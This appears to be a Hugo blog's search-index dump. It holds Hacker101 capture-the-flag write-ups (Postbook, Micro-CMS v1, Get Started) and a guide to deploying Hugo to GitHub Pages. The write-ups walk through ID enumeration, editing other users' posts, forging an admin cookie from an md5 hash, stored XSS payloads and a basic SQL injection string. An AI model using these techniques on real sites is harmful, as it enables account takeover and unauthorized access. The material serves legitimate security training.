FLAG!\nFlag3 Hint0: 189 * 5 So far, our known pages are:\nFunctional pages:\naccount.php create.php delete.php edit.php profile.php sign_in.php sign_out.php view.php Posts can be read on view.php\u0026amp;id=1..6\nCommon question: What else is there?!\nRemember, posts are created on pages indexed by numbers. The hint contains numbers.\nAt this point to speculate that we will find our FLAG on /index.php?page=view.php\u0026amp;id=945 might be the quick solution.\nI\u0026rsquo;ve struggled ~2 hours with ffuf to FUZZ id parameter in the request, without luck. I\u0026rsquo;ll try that later.\nThere may be a bunch of wordlists containing numbers only, but, to save time, let\u0026rsquo;s create our own containing numbers from 0 to 1000. Find more here or here.\n#!/usr/bin/python3 df=open(\u0026#39;numbers.txt\u0026#39;,\u0026#39;w\u0026#39;) for i in range(0,1000): df.write(str(i)) df.write(\u0026#39;\\n\u0026#39;) df.close() Open a text editor, insert above and save as numbers.py.\nAdd permission for execution with\nchmod +x numbers.py and run with\npython3 numbers.py I beg your pardon for a dirty little python script above, not the most elegant solution. But, once my supervisor said: \u0026ldquo;a working program is better today, than a perfect one tomorrow\u0026rdquo; :)\nI gave a shot for Burp Intruder, just for the sake of it..\nEnable Intercept on Proxy tab and refresh page with the first post. Right click on the request and select Send to Intruder.\nOn the Positions tab, clear all payload positions with Clear § on the right and select only the value of id parameter (here: 1). Click Add §.\nBurp Suite Community Edition is free, but Intruder is extremely slow due to throttling. So, I\u0026rsquo;ve created a shorter wordlist, containing only [1,2,3,4,5,6,7,8,9,945].\nSwitch to Payloads tab and load a wordlist under Payload Options [Simple list] using the Load\u0026hellip; button.\nWe\u0026rsquo;re all set, hit Start attack on the top right corner.\nGreat, at least that worked. Check Request 1 where Payload is 1.\nA bit ugly, how about switching to Render tab? Much better.\nIf you check the results, you\u0026rsquo;ll see that all the pages with Post not found response will have the same 1500 length.\nOkay, get the FLAG by checking Request 10 with Payload 945:\nFlag4 Hint0: You can edit your own posts, what about someone else\u0026rsquo;s? After you logon with user / password credentials from Flag1, you can see two posts on the Home page.\nOne of them can be edited , the other\u0026rsquo;s author is admin. Open the Hello everyone! post for view.\nThe id=3 at the end of the URL identifies the post. Get back to Home page and open the other post by admin.\nIt has id=1. Let\u0026rsquo;s open the post Hello everyone! for editing and change the id from 3 to 1 (and hit enter):\nChange something and then Save post.\nA new FLAG:\nFlag5 Hint0: The cookie allows you to stay signed in. Can you figure out how they work so you can sign in to user with ID 1? We already know from Flag1, that we can view admin\u0026rsquo;s profile by changing id=c to id=b.\nLogged in as user, open developer tools, switch to Application tab and select the website\u0026rsquo;s cookies on the left, under Storage.\nOur user has c81e728d9d4c2f636f067f89cc14862c as id. It\u0026rsquo;s a hash, we need to decrypt it. I\u0026rsquo;ve used this page for the task, ther result is 2. Remember Flag2? This is our user_id.\nWe can edit cookie values with the browser\u0026rsquo;s developer tools, but first we neew the md5 hash value of 1. Our friend is the terminal.\necho -n 1|md5sum Sign out from the page. Cookies will be flushed.\nRight-click on the area where cookies would be listed and select Add new\nUse id as Name and c4ca4238a0b923820dcc509a6f75849b as value.\nClick Home and you can see your new FLAG, logged in as admin.\nWe can also use Burp to intercept the requests and tamper cookies before forwarding it.\nFlag6 Hint0: Deleting a post seems to take an ID that is not a number. Can you figure out what it is? Deleting a post will pass the post id to /index.php?page=delete.php page as a hashed value.\nWe can guess from the same post\u0026rsquo;s edit link in the above line (/index.php?page=edit.php\u0026amp;id=4), that the hashed value will be close to 4, but to be sure, I\u0026rsquo;ve checked it on this page:\nLet\u0026rsquo;s delete Admin\u0026rsquo;s Hello world post, which has an id=1. Using the command from previous Flag:\necho -n 1|md5sum Our URL will be:\n/index.php?page=delete.php\u0026amp;id=c4ca4238a0b923820dcc509a6f75849b\n\u0026hellip; resulting the last FLAG!\nTakeaway(s) Look for easy to guess passwords Check if you can tamper with input parameters Broken authentication (can access other user\u0026rsquo;s private content) Use automated scanning to check missed pages (due to high page id or other weird stuff) Weak encryption (md5) used in cookie for authentication id to obfuscate link ","permalink":"https://d0rksec.github.io/writeups/h101/postbook/","summary":"Small PHP site with private/public posts to play with","title":"Hacker101 - Postbook"},{"content":"What A small CMS, with very basic functions.\nDifficulty: Easy\nFlag0 Hint0: Try creating a new page Hit the link Create a new page. Fill out title and content. Click Save button to create the page. Hint1: How are pages indexed? Pages are indexed with ascending numbers in a form of /page/$ (like *.ctf.hacker101.com/page/1, /2, etc.)\nHint2: Look at the sequence of IDs Testing is /page/1.\nMarkdown Test is /page/2.\nThe page we have created starts at */page/11.\nWhat is between page/2 and page/11?\nHint3: If the front door doesn\u0026rsquo;t open, try the window Edit the page ID in the address bar and open page/3, page/4, etc.\nYou\u0026rsquo;ll find that /page/5 is Forbidden.\nHint4: In what ways can you retrieve page contents? When you open /page/1 (Testing) or /page/2 (Markdown Test), or on the page you\u0026rsquo;ve created, see that link Edit this page? Open any pages above for editing and check the URL! It is /page/edit/$.\nChange the ID to 5 (/page/edit/5) and collect the first FLAG. Flag1 Hint0: Make sure you tamper with every input What inputs do we have on this site (make a habit of manually looking around on a site)?\nThere are form inputs on Edit Page (/page/edit/$) and on Create Page (/page/create):\nTitle: \u0026lt;input type=\u0026quot;text\u0026quot;\u0026gt;\nText: \u0026lt;textarea name=\u0026quot;body\u0026quot;\u0026gt;\nHint1: Have you tested for the usual culprits? XSS, SQL injection, path injection XSS has worked only on Title field (see FLAG2). There is a comment under the textarea: \u0026ldquo;Markdown is supported, but scripts are not\u0026rdquo;.\nFor SQL injection, see last hint.\nNo luck with path injection.\nHint2: Bugs often occur when an input should always be one type and turns out to be another Title field expects text, javascript worked here (see FLAG2).\nBody textarea accepts only markdown, javascript filtered there.\nURL expects only numbers as page ID.\nHint3: Remember, form submissions aren\u0026rsquo;t the only inputs that come from browsers \u0026hellip; Also, there is the address bar in the browser.\nPut a single apostrophe (') after the page\u0026rsquo;s URL in the address bar, like /page/edit/1' for the FLAG.\nThis simulates the case when a page ID (in this case \u0026ldquo;1\u0026rdquo;) is processed by a backend script and used in an SQL query without sanitizing it first. See more on SQL injection (a very basic injection would be something like /page/edit/1' or 1=1; --), but here, to get the flag, a single apostrophe is enough. I\u0026rsquo;ve tried some basic injection after it without luck.\nFlag2 Hint0: Sometimes a given input will affect more than one page The first input I\u0026rsquo;ve tried has resulted in a FLAG.\nOpen a page for editing, then insert \u0026lt;script\u0026gt;alert('1')\u0026lt;/script\u0026gt; into the Title field:\nCreate the page.\nHint1: The bug you are looking for doesn\u0026rsquo;t exist in the most obvious place this input is shown You are inserting the XSS on some page\u0026rsquo;s Title field. If you reload the page, nothing happens. Try navigating to the Home page :)\nHome page lists the page titles in an unordered list. List items use Title field values without satitation. This is where our payload kicks in.\nFlag3 Hint0: Script tags are great, but what other options do you have? Using markdown, you can insert URLs, buttons, images on the page.\nIf you load Markdown Test page (/page/2), there is an example for an image (broken) and a button element.\nEdit the page.\nLook up on HTML/JS reference, what inline options you have for a button tag. I\u0026rsquo;ve inserted onclick=\u0026quot;alert('3')\u0026quot; here.\nSave the page, XSS would just work fine. But where\u0026rsquo;s my FLAG?\nCheck the source of the page to get your last FLAG!\nI\u0026rsquo;ve also tried XSS on the image element, following this link, but couldn\u0026rsquo;t manage to make it work.\nTakeaway(s) Manually try all available functions of the site, understand how they works Whatch for low-hanging fruits, like unsanitized user inputs (XSS, SQLi) Look for \u0026ldquo;missing\u0026rdquo; pages ","permalink":"https://d0rksec.github.io/writeups/h101/micro-cms_v1/","summary":"A small CMS with very basic functions","title":"Hacker101 - Micro CMS_v1"},{"content":"What A simple, one-page site.\nDifficulty: Trivial\nFlag0 Hint0: Take a look at the source for the page Hit F12 and check Elements tab. Check all sources of the page, even \u0026lt;head\u0026gt; and \u0026lt;style\u0026gt;. Hint1: Does anything seem out of the ordinary? There is a background-image added to the body element in \u0026lt;style\u0026gt;, but we can\u0026rsquo;t see it rendered.\nHint2: The page looks really plain Is the image even loading? Is it available (Status 200)? Hint3: What is that image? Open the image on a new tab. If you download the image and open it with Chrome, you\u0026rsquo;ll only see a white square. If you try to open it with an image viewer, it will throw an error.\nLet\u0026rsquo;s create a copy from the image and change the file extension from .png to .txt. Now you can open the file with a simple text editor to see your flag.\nTakeaway(s) Always check html, css, js sources for mistakes, forgotten comments and other weird stuff ","permalink":"https://d0rksec.github.io/writeups/h101/get-started/","summary":"Trivial - A little something to get you started","title":"Hacker101 - Get Started"},{"content":"Hugo \u0026lt;3 GitHub Pages With Hugo, I was able to quickly deploy a functional website with plenty of themes to select from. Hugo is somewhere between you build up a site from HTML+CSS+JS by hand and a fully hosted site, where your only job is to edit content in some online Markdown editor. With this setup, you can manually change theme settings or the structure of your content, play with git - if you want. If you\u0026rsquo;re satisfied with the look of your site, you can just push content to it.\nThe pages you would need the most to start with David Saltares - Easily deploy your Hugo site to Github Pages Official Hugo Quickstart Short list of steps Creat d0rksec.github.io repo (public, with readme.md)\nCreat d0rksec.github.io-dev repo (private, with readme.md)\nClone d0rksec.github.io-dev repo to computer (for example, into /stuff)\ngit clone https://github.com/d0rksec/d0rksec.github.io-dev.git Populate /stuff/d0rksec.github.io-dev/ with a blank site (following steps on local computer):\nInstall Hugo (.deb worked well, had permission issues with snap package)\nCreate a blank site\nhugo new site /stuff/d0rksec.github.io-dev/ --force Generate a public/private key pair for publishing\nssh-keygen -t rsa -b 4096 -C \u0026#34;\u0026lt;email\u0026gt;\u0026#34; -f publish_key -P \u0026#34;\u0026#34; On GitHub, add deploy key for d0rksec.github.io and paste contents of publish_key.pub\nOn GitHub, add new secret to d0rksec.github.io-dev as ACTIONS_DEPLOY_KEY and paste contents of publish_key\nCreate /stuff/d0rksec.github.io-dev/.gitignore\nInstall theme (PaperMod) as submodule\ncd /stuff/d0rksec.github.io-dev git submodule add --depth=1 https://github.com/adityatelange/hugo-PaperMod.git themes/PaperMod git submodule update --init --recursive Copy favicon files into /stuff/d0rksec.github.io-dev/static/\nCreate /stuff/d0rksec.github.io-dev/content/archives.md\nCreate /stuff/d0rksec.github.io-dev/content/search.md\nCreate /stuff/d0rksec.github.io-dev/.github/workflows/deploy.yml\nAfter hugo server -D, check https://localhost:1313 how the site looks like\nIn /stuff/d0rksec.github.io-dev/\ngit add --all git commit -m \u0026#34;site created\u0026#34; git push -u origin main Cross fingers and check https://github.com/d0rksec/d0rksec.github.io/actions\nUseful links https://gohugo.io/getting-started/quick-start/ https://saltares.com/easily-deploy-your-hugo-site-to-github-pages/ https://github.com/adityatelange/hugo-PaperMod/wiki/Installation https://github.com/peaceiris/actions-gh-pages https://muhannad0.github.io/post/using-github-actions-to-deploy-my-blog/ https://medium.com/@asishrs/automate-your-github-pages-deployment-using-hugo-and-actions-518b959a51f9 ","permalink":"https://d0rksec.github.io/2022/04/hugo-101-deploy-to-github-pages/","summary":"How I created this site","title":"Hugo 101 - Deploy to GitHub Pages"}]